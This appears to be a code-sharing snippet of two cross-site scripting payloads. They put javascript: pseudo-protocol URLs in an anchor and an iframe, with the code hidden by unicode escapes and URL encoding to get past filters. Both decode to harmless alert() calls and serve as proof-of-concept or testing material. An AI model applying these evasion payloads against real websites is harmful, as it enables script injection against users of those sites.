XSS-Payload-JS-pseudo-protocol
by zicai
HTML
<!-- JavaScript 伪协议 -->
<!-- 先 JavaScript 编码,再 URL 编码,再 HTML 编码 -->
<a href="javascript:%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%27a-href%27%29">click me</a>
<iframe src="javascript:%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%27iframe-src%27%29" frameborder="0"></iframe>